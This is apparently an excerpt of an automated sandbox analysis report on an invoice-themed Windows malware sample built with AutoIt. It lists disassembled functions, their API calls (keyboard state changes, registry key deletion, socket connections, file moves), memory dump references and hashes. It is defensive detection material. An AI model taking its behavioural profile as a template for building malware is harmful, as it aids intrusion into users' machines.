                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                            • String ID: @
                                                                            • API String ID: 3522835683-2766056989
                                                                            • Opcode ID: b0d8e3c33385c84a1c64d6f15c2cc21ea36a33e50904d86153379d3515a5a5f0
                                                                            • Instruction ID: c2b8b0109cdb16657657a5ef7e88bd8061349534a1479801c64e61deda50a4f1
                                                                            • Opcode Fuzzy Hash: b0d8e3c33385c84a1c64d6f15c2cc21ea36a33e50904d86153379d3515a5a5f0
                                                                            • Instruction Fuzzy Hash: F6617E75E006199FCB14EF64C8819AEBBF5FF49320F14806AE859BB361CB31AD45DB90
                                                                            Function 00F30F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 00F30F8C
                                                                            • GetKeyboardState.USER32(?), ref: 00F30FA1
                                                                            • SetKeyboardState.USER32(?), ref: 00F31002
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F31030
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F3104F
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F31095
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F310B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: f37887d4409e05bd1faba481cfa108e9fd26fc352ffb9157b43d0889283ab60a
                                                                            • Instruction ID: b6a4bdfa84d236b97b0385f646ab9d99e1ad6e766d9820b896e2ad8551957260
                                                                            • Opcode Fuzzy Hash: f37887d4409e05bd1faba481cfa108e9fd26fc352ffb9157b43d0889283ab60a
                                                                            • Instruction Fuzzy Hash: D851E5A09047D53DFB3642348C15BBABEA96B06334F08858AE1D5468D3C6D9DCC8F751
                                                                            Function 00F30D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 00F30DA5
                                                                            • GetKeyboardState.USER32(?), ref: 00F30DBA
                                                                            • SetKeyboardState.USER32(?), ref: 00F30E1B
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F30E47
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F30E64
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F30EA8
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F30EC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 8500d8b455b45fa0a3f996a0b7f31971ac6325429d56f1f450ec999539bef0c0
                                                                            • Instruction ID: 5247d08dc320b86c4622c7bdd8886b2a635b1fe0f3e3870de238eee9e9158a43
                                                                            • Opcode Fuzzy Hash: 8500d8b455b45fa0a3f996a0b7f31971ac6325429d56f1f450ec999539bef0c0
                                                                            • Instruction Fuzzy Hash: E251D6A0A447D57DFB3683748C65B7A7EA96B06330F08888AE1D4464C2DB95ECD8F750
                                                                            Function 00F355FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 2945705084-0
                                                                            • Opcode ID: 5606dd58f83386146577aacbf66d28c13cd209456486e2df2e86d18f1ec0f4f0
                                                                            • Instruction ID: 5c8b7f8f4e99025040688845f3f2fa6e8899077c95846e667946ddc3fa45522f
                                                                            • Opcode Fuzzy Hash: 5606dd58f83386146577aacbf66d28c13cd209456486e2df2e86d18f1ec0f4f0
                                                                            • Instruction Fuzzy Hash: 69419265C1161C76CB11EBF4984A9EFB3F8AF44710F509956EB08F3221EB34A345C7AA
                                                                            Function 00F33671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33697,?), ref: 00F3468B
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33697,?), ref: 00F346A4
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00F336B7
                                                                            • _wcscmp.LIBCMT ref: 00F336D3
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F336EB
                                                                            • _wcscat.LIBCMT ref: 00F33733
                                                                            • SHFileOperationW.SHELL32(?), ref: 00F3379F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 1377345388-1173974218
                                                                            • Opcode ID: 13dccf47d717feef70fbb5f147d5f6d8b19cb5c456304932fad53535219527e5
                                                                            • Instruction ID: 486b5fddca599cd307dee2125a19a8f9a460f1156c3241d1ab995c93097f4931
                                                                            • Opcode Fuzzy Hash: 13dccf47d717feef70fbb5f147d5f6d8b19cb5c456304932fad53535219527e5
                                                                            • Instruction Fuzzy Hash: D341B471508348AEC751EF64C8469DFB7E8EF883A0F00186EF59AC3251EB34D689D752
                                                                            Function 00F57291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F572AA
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57351
                                                                            • IsMenu.USER32(?), ref: 00F57369
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F573B1
                                                                            • DrawMenuBar.USER32 ref: 00F573C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3866635326-4108050209
                                                                            • Opcode ID: ac54108469644d1574250a9fd1c465d2f58171ce95b332281568d95b39c393a6
                                                                            • Instruction ID: 1ee7336059c3e6e0310a142e7d6043b66ce06ade13b593bab1a80667d5388d5e
                                                                            • Opcode Fuzzy Hash: ac54108469644d1574250a9fd1c465d2f58171ce95b332281568d95b39c393a6
                                                                            • Instruction Fuzzy Hash: 15411875A04308AFDB20EF50E884A9ABBF8FF05361F149569FE15A7250D730AD58EF50
                                                                            Function 00F50FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F50FD4
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F50FFE
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00F510B5
                                                                              • Part of subcall function 00F50FA5: RegCloseKey.ADVAPI32(?), ref: 00F5101B
                                                                              • Part of subcall function 00F50FA5: FreeLibrary.KERNEL32(?), ref: 00F5106D
                                                                              • Part of subcall function 00F50FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F51090
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F51058
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 395352322-0
                                                                            • Opcode ID: 52d1ad052f2c01224736867caabe424add3ac4d41fec65dcd3ae7bbf89c37076
                                                                            • Instruction ID: 98ee071ef8ec4f2b9aacf130e2dcd90cca917566a732d43d919057fb4b99051a
                                                                            • Opcode Fuzzy Hash: 52d1ad052f2c01224736867caabe424add3ac4d41fec65dcd3ae7bbf89c37076
                                                                            • Instruction Fuzzy Hash: 9231E171D01109BFDB159F90DC85EFFB7BCEF08311F044169EA15A2191DA74AE89AA60
                                                                            Function 00F562CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F562EC
                                                                            • GetWindowLongW.USER32(01142618,000000F0), ref: 00F5631F
                                                                            • GetWindowLongW.USER32(01142618,000000F0), ref: 00F56354
                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F56386
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F563B0
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00F563C1
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F563DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: 5d69312cc440b590e6df9c911eab3f4942c91a08d5b2164a0c4c9abae23162be
                                                                            • Instruction ID: b66c3fddf178f7f9942fe82f41144603ecc0bc823e7063bd720b2db7406f2487
                                                                            • Opcode Fuzzy Hash: 5d69312cc440b590e6df9c911eab3f4942c91a08d5b2164a0c4c9abae23162be
                                                                            • Instruction Fuzzy Hash: 20310231A44254AFEB21CF18DC84F5537E1FB4A766F5901A5FA21CF2B2CB71A848EB50
                                                                            Function 00F2DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DB2E
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DB54
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00F2DB57
                                                                            • SysAllocString.OLEAUT32(?), ref: 00F2DB75
                                                                            • SysFreeString.OLEAUT32(?), ref: 00F2DB7E
                                                                            • StringFromGUID2.COMBASE(?,?,00000028), ref: 00F2DBA3
                                                                            • SysAllocString.OLEAUT32(?), ref: 00F2DBB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 1d627bf2289a62c1be0a9650af710bdbc05c434247d8e4701d7cd716545ef343
                                                                            • Instruction ID: a2ecd81b445321f0d00a16c0abb3e027f94c90390ba48e78a474673e01843b43
                                                                            • Opcode Fuzzy Hash: 1d627bf2289a62c1be0a9650af710bdbc05c434247d8e4701d7cd716545ef343
                                                                            • Instruction Fuzzy Hash: 4521A132A01229AF9F10DFA8EC98CBB73ACEB48360B018165FE14DB250D770AC45A760
                                                                            Function 00F46173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F47D8B: inet_addr.WS2_32(00000000), ref: 00F47DB6
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00F461C6
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F461D5
                                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F4620E
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00F46217
                                                                            • WSAGetLastError.WS2_32 ref: 00F46221
                                                                            • closesocket.WS2_32(00000000), ref: 00F4624A
                                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F46263
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 910771015-0
                                                                            • Opcode ID: f1d71fa9cefbb146e9cf347d144fef5de70a23f85184f6b7a7addef3026157fe
                                                                            • Instruction ID: f96622487f24c48d7d495a5fe31156605814c3d2c7595170c004ba5b2a92468d
                                                                            • Opcode Fuzzy Hash: f1d71fa9cefbb146e9cf347d144fef5de70a23f85184f6b7a7addef3026157fe
                                                                            • Instruction Fuzzy Hash: F331B531600218AFDF10AF24CC85BBD7BACEF45721F044069FD05E7291DB74AD04AB62
                                                                            Function 00F2F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            • Opcode ID: b68013415dc17d1434a9676e1dc648da957e45b3e27520895bf84beb201ba558
                                                                            • Instruction ID: d7b0e517e03bdd2465cbf657c8721f5fc620e971f4ddf342e3b71c6011ab24c6
                                                                            • Opcode Fuzzy Hash: b68013415dc17d1434a9676e1dc648da957e45b3e27520895bf84beb201ba558
                                                                            • Instruction Fuzzy Hash: CD21467262463166D220AB34FC02FB773E8EF55360F14403AF946D6191EB519D4AE395
                                                                            Function 00F2DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DC09
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DC2F
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00F2DC32
                                                                            • SysAllocString.OLEAUT32 ref: 00F2DC53
                                                                            • SysFreeString.OLEAUT32 ref: 00F2DC5C
                                                                            • StringFromGUID2.COMBASE(?,?,00000028), ref: 00F2DC76
                                                                            • SysAllocString.OLEAUT32(?), ref: 00F2DC84
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: d10a570f7ebb7deea310ad14774db363ce25b4c6d0228805ab16e92cf88feb6c
                                                                            • Instruction ID: 389a07bc5a250cfe724fcea3ebb9ab63d94e8c44668b2665dcf4f37a7805f62e
                                                                            • Opcode Fuzzy Hash: d10a570f7ebb7deea310ad14774db363ce25b4c6d0228805ab16e92cf88feb6c
                                                                            • Instruction Fuzzy Hash: 36219836605218AFDB10DFB8EC88DBB77ECEB09360B508165FA14CB261D670EC45D764
                                                                            Function 00F575CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ED1D73
                                                                              • Part of subcall function 00ED1D35: GetStockObject.GDI32(00000011), ref: 00ED1D87
                                                                              • Part of subcall function 00ED1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED1D91
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F57632
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F5763F
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F5764A
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F57659
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F57665
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            • Opcode ID: 14f34e80d08a124e1995d8a1fbe2fcd3c6093aa7d1e7bf5c424af4fe45c29e50
                                                                            • Instruction ID: fbf0f2c22f543d5b195b651ee75b1ace989039557b2db1eaca9596d9916a0ab2
                                                                            • Opcode Fuzzy Hash: 14f34e80d08a124e1995d8a1fbe2fcd3c6093aa7d1e7bf5c424af4fe45c29e50
                                                                            • Instruction Fuzzy Hash: 4A1193B211021DBFEF159F64CC85EE77F5DEF087A8F014115BB04A2050CA729C21EBA4
                                                                            Function 00EF9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 00EF9AE6
                                                                              • Part of subcall function 00EF3187: RtlEncodePointer.NTDLL(00000000), ref: 00EF318A
                                                                              • Part of subcall function 00EF3187: __initp_misc_winsig.LIBCMT ref: 00EF31A5
                                                                              • Part of subcall function 00EF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EF9EA0
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EF9EB4
